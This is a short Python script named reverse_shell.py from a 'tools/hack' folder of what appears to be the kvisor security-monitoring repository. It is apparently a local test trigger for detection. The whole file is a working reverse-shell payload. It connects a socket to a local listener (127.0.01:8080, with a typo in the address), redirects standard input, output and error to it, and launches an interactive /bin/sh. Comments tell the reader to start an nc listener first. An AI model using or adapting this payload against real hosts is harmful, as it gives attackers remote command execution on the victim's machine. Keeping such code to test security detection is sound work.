github.com/castai/kvisor@v1.7.1-0.20240516114728-b3572a2607b5/tools/hack/reverse_shell.py (about) 1 ## Start server with nc -l 127.0.0.1 8080 2 ## And run this script and separate shell. 3 4 import socket,subprocess,os 5 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 6 s.connect(("127.0.01", 8080)) 7 os.dup2(s.fileno(),0) 8 os.dup2(s.fileno(),1) 9 os.dup2(s.fileno(),2) 10 p=subprocess.call(["/bin/sh","-i"])